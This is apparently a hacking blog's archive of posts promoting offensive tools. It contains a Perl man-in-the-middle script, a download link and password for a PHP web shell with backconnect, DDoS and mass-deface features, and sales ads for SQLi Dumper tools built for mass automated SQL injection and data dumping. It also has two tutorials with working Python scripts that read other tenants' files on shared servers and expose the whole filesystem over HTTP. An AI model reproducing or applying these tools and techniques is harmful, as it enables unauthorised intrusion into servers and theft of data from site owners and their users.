Feb 21, 2015

0
Juli - Perl MiTM Attack Script

A simple automated perl script for MiTM ( man-in-the-middle ) attacks.
Works on linux as a root user , combinied with sslstrip and arpspoof.
Idea of the script it's simply to spy traffic over your network connected devices.

The can be found on github  Juli
And this is the offical blog post of Juli Script
Oct 28, 2012

3
Alb0zZ Team Shell ░▒▓█►PRIV8 TILL NOW◄█▓▒░ ~ [Unique Features] [FREE]

By a frend, 0x0
-=-=-=-=-=-=-=-=

Some skids leaked download link so why dont i share myself

Author: 0x0


I would like to give credits to:
DevilzCode (perl symlink script)
Syrian Shell (ddos & zone-h)
x-h4ck (Cloudflare ip finder)

Features


3 login attemps
ready commands
execute command
create file
chmod file
file manager
view file
download
rename
delete
upload (choose dir)
turn off magic_quotes_gpc
encode/decode (base64/urlencode/md5/sha1/sha512)
bind/backconnect (5)
get exploit and execute
auto symlink (perl)
eval
mass script deface
processes
zone-h
ddos
mysql connect (unique)
tools (mass mail, Cloudflare, Hide Shell, CMS Fack, List Directory, Text 2 Hex, LFI Dude)
phpinfo
logout
kill shell

Screenshots

Login:

Main window:
File manager:
Htaccess tweaks:
Bind/backconnect:
symlink:
get file(exploit):
tools:

NOTE: There are few encrypted scripts inside the shell, you can decrypt them using encoder tools (not backdoor)


Support download link: http://fileme.us/file/03hrd

Password: yuno

or if you cant download from sharecash

http://adf.ly/DgNoW
Oct 2, 2012

6
SQLi Dumper v.5.0

SQLi Dumper - Advanced SQL Injection\Scanner Tool

Designed to be automated to find and exploit
 web security vulnerabilities in mass.It is robust,
 works in the background threads and is super faster.
Uses an advanced search engine with seven
 different online search services
(Google, Yandex, Bing, Yahoo, Sapo, Altavista and Terravista).


SQLi Dumper Features:
 -Suports Multi. Online search engine (to find the trajects);
 -Automated exploiting and analizing from a URL list;
 -Automated search for data in a bulk URL list;
 -Automated analizer for injections points using 
URL, POST, Cookies, UserLogin or UserPassword;
 -Dumper suports dumping data with multi-threading 
(databases/tables/columns/fetching data);
 -Exploiter suports up to 100x threads;
 -Analizer and Dumper suports up to 50x threads;
 -Advanced WAF bypass methods; 
 -Advanced custom query box; 
 -Dumper can dump large amounts of data, with greats 
control of delay each request (multi-threading);
 -Easy switch vulnerabilities to vulnerabilities;
 -Suports proxies list;
 -GeoIP database;
 -Internal database;
 -Trash System;
 -Admin login finder;
 -Hash online cracker;
 -Reverse IP;
 -Standalone .exe (no install).
SQL Injection Methods suported: 
- MySQL
 - Union (Integer / String)
 - Error (Integer / String)
 ** Error Methods:
  - Double Query
  - XPATH - ExtractValue
  - XPATH - UpdateXML
 - Brute Forcing
 - Blind
 - Load File
 - Load File Scanner
 ** Illegal Mix Of Collations:
  - UnHexHex()
  - Binary()
  - Cast As Char
  - Compress(Uncompress())
  - Convert Using utf8
  - Convert Using latin1
  - Aes_decrypt(aes_encrypt())
- MS SQL
 - Union (Integer / String)
 - Error (Integer / String)
 ** Illegal Mix Of Collations:
  - SQL_Latin1;
  - Cast As Char.
- Oracle
 - Union (Integer / String)
 - Error (Integer / String)
 ** Error Methods:
  - GET_HOST_ADDRESS
  - DRITHSX.SN
  - GET;APPINGXPATH.
 ** Illegal Mix Of Collations:
  - Cast As Char.
 ** Suports TOP N Types: 
  - ROWUM
  - RANK()
  - DESE_RANK()

** Analizer detects also:
 - MS Access
 - PostgredSQL
 - Sybase
 
 
** For using this tool you should know a little
 about SQL Injections.

Demo Version Limitations:

 - Max. URL per Search 500
 - Get links by ReverseIP DISABLED
 - Max. Trash 5000 URLs
 - SQL Injection Obfuscate - Bypass Functions and 
Keywords Filtering DISABLED
 - Exploiter Max. Threads 20
 - Analizer Max. Threads 3
 - Running multiples instancies DESABLED
 - Running multiples mini dump instancies DESABLED
 - Dumping Rows with multi-threading DESABLED
 - Network Credential DISABLED
 - Injection Methods for POST, Cookies, etc.. DESABLED
 - Proxy DISABLED
 - ReverseIP DISABLED
 - Load_File() scanner DISABLED

 ** Download: http://www.mediafire.com/?vfb8fps2beppsib
 ** Dependencies: Microsoft .NET Framework 4.x
  http://www.microsoft.com/en-us/download/details.aspx?id=17851
 
Price and Payment Method:
 - Binary (EXE): 150 USD / 115€ Euro
 - Source Code (VB.NET 2010): 2.000 USD / 1.550€ Euro
 ** Liberty Reserve

Contacts:

 - mysqlidumper [at] gmail [dot] com (email)
 - c4rl0s@jabber.org (IM Chat)

More Screen Shots:

http://imageshack.us/a/img40/9792/54476110.png
http://imageshack.us/a/img26/7343/43570486.png
http://imageshack.us/a/img833/1754/29794037.png
http://imageshack.us/a/img838/5985/62974282.png
http://imageshack.us/a/img405/2636/41411581.png
http://imageshack.us/a/img253/7108/87770469.png
http://imageshack.us/a/img845/5708/27459044.png
http://imageshack.us/a/img253/4696/23767618.png
http://imageshack.us/a/img338/4593/86695223.png
http://imageshack.us/a/img689/1859/84670334.png
http://imageshack.us/a/img692/4218/79948522v.png
http://imageshack.us/a/img571/690/48570647.png
http://imageshack.us/a/img27/8163/19180735.png
http://imageshack.us/a/img823/6977/14995786.png
http://imageshack.us/a/img443/4640/60463828.png
http://imageshack.us/a/img841/9392/43723692.png
http://imageshack.us/a/img20/8374/86406807.png
http://imageshack.us/a/img221/7549/38372480.png
http://imageshack.us/a/img16/1558/76135157.png
http://imageshack.us/a/img411/1913/97064053.png
http://imageshack.us/a/img208/1747/83970473.png
http://imageshack.us/a/img840/6143/78458462.png
http://imageshack.us/a/img268/5611/96006062.png
http://imageshack.us/a/img253/3442/47787419.png
http://imageshack.us/a/img849/4741/14173095.png
http://imageshack.us/a/img191/1821/61869828.png  
Aug 13, 2012

1
MySQLi Dumper | SQLi Injection Tool

MySQLi Dumper is an advanced automated SQL Injection tool dedicated to SQL injection attacks on MySQL and MS SQL.
It is designed to be automated to find and exploit web security vulnerabilities in mass.
It Is robust, works in the background threads and is super faster.

The power of MySQLi Dumper that makes it different from similar tools:
  1. -Suports Multi. Online search engine (to find the trajects);
  2. -Automated exploiting and analizing from a URL list, with a greats success rate;
  3. -Automated search for columns names from a URL list (search for columns name 'where like %value%', useful to find eg. mails);
  4. -Dumper suport dumping data with multi-threading (databases/tables/columns/fetching data);
  5. -Dumper can dump large data, with greats control of delay per request (multi-threading);
  6. -Easy switch vulnerabilities to vulnerabilities;
  7. -You can see everthing that is load by HTTP request (HTTP Debbuger)
Some features:
  1. -Online mult. search engine;
  2. -Suport MySQL Union, MySQL Error, MS SQL Union, MS SQL Error Integer/String;
  3. -Automated Exploiting;
  4. -Automated Analizing;
  5. -Trash System (you never exploit the same URL);
  6. -Database to collect all vulnerabilities (with option to search for data in mass);
  7. -Customized exploiter and analizer;
  8. -GeoIP database;
  9. -Small browser you can use to Union Count, view source code and HTTP headers;
  10. -Back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running custom SQL statements, suport save/load sessions to XML file;
  11. -Bruter forcing for MySQL <= 4.x
  12. -File dumper for MySQL;
  13. -File dumper Scanner for MySQL;
  14. -Blind dumper for MySQL;
  15. -WAF bypass method;
  16. -Suport single proxy or proxies list (random/by order).
  17. -Hash online crack;
  18. -Admin login finder;
  19. -Multi-Threading;
  20. -User friendly GUI;
Sreen Shots







For using this tool you should know a little about SQL Injections.
Price 60€ / 74 USD Full version.
Full source code 1000€ / 1227 USD
Accepted payments
- libertyreserve.com
- moneybookers.com (trusted users)
- paypal.com (maybe..)
Dependencies: .NET Framework v.4
Demo Version available (older version only)!
Download: http://www.mediafire.com/?wberio939vwh1ez
Demo Limitations
Max. URL per Search 500
Get links by ReverseIP DISABLED
Max. Trash 5000 URLs
SQL Injection Obfuscate - Bypass Functions and Keywords Filtering DISABLED
Exploiter Max. Threads 20
Analizer Max. Threads 3
Network Credential DISABLED
Proxy DISABLED
ReverseIP DISABLED
Blinder are disabled in DEMO EDITION, you can check the Version() only for a demo :)
Load_File() scanner DISABLED
if you bought the v. 4.x
Email me for free update!
Contact: mysqlidumper [ at ] gmail [ dot ] com
May 22, 2012

1
Server Bypass via Symlink - Jumping in server Part 2

Let's go with next method of symlink server bypassing , like u see and into before post now i will explain a new trick with an other tool.
http://www.flashcrew.in/2012/05/server-bypass-via-symlink-jumping-in.html

-------------------------
Here we will talk about an other tool who use python permission to read other folders/ files in same server.
Tool called xplor.py and here it's the source

 #!/usr/bin/env python
# devilzc0de.org (c) 2012
import sys
import os

def copyfile(source, dest, buffer_size=1024*1024):
    if not hasattr(source, 'read'):
        source = open(source, 'rb')
    if not hasattr(dest, 'write'):
        dest = open(dest, 'wb')
    while 1:
        copy_buffer = source.read(buffer_size)
        if copy_buffer:
            dest.write(copy_buffer)
        else:
            break
    source.close()
    dest.close()

if __name__=="__main__":
    if not len(sys.argv) == 3 and not len(sys.argv) == 2:
        sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
        sys.exit(1)
   
    target = sys.argv[1].replace("\\","/")
    if os.path.isdir(target):
        if not target.endswith("/"):
            target = target + "/"
        dir = os.listdir(target)
        for d in dir:
            fs = ""
            if os.path.isdir(target + d):
                fs = "[ DIR ]"
            elif os.path.isfile(target + d):
                fs = os.path.getsize(target + d)
                fs = str(fs)
               
            sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
    elif os.path.isfile(target):
        if len(sys.argv) == 3:
            copyfile(target, sys.argv[2])
        else:
            f = open(target, "rb")
            try:
                byte = f.read(1024)
                sys.stdout.write(byte)
                sys.stdout.flush()
                while byte != "":
                    byte = f.read(1024)
                    sys.stdout.write(byte)
                    sys.stdout.flush()
            finally:
                f.close()
    else:
        sys.stdout.write("Can't found file or folder : " + target)

http://pastebin.com/WqmCE2sJ

testing the script python xplor.py

User the tool to view folders where not have any permission to read inside

python xplor.py /var/www/index.php


View the files in no access folder .
python xplor.py /var/www/index.php


copy/ save ur file
python xplor.py /var/www/indro/ketek.jpg ketek.jpg
Posted Image

And yeah file it's here
Posted Image

Yeahh fucking access it's granted 


Some thing u can do with those other scripts in perl 
webs.pl
and
xplor.pl


enjoy it :)

4
Server Bypass via Symlink - Jumping in server Part 1

As we all know, symlinking it's on of greates methods for bypassing server security, mean to read files of other site in same shared host.
For getting success with this tutorial are required the following things:
  • Python Installed on Server
  • b374k.php shell
  • And some scripts u will see below.
This idea have start from devilzc0de geeks and let me explain how it work.


here we are in folder /var/www/dono and trying to go into /www/
no permissions to go into /www .
before we got tired by trying the commands u must check if if python it's installed with command :
python -h
Now take this python script and name it as webs.py , It's a little python script who will open a new port on server SimpleHTTPServer ( python ) module. Default port from script it's 13123 .
#!/usr/bin/env python
# devilzc0de.org (c) 2012
import SimpleHTTPServer
import SocketServer
import os

port = 13123
if __name__=='__main__':
        os.chdir('/')
        Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

        httpd = SocketServer.TCPServer(("", port), Handler)

        print("Now open this server on webbrowser at port : " + str(port))
        print("example: http://maho.com:" + str(port))
        httpd.serve_forever()
http://pastebin.com/PddvszKC 


Next u wil need to run the webs.py script by following command
python webs.py

 open the site with port 13123
site.com:13123



And enjoy the symilinking, in next post i will show u how to do this in another way :)
 
FlashcRew Blog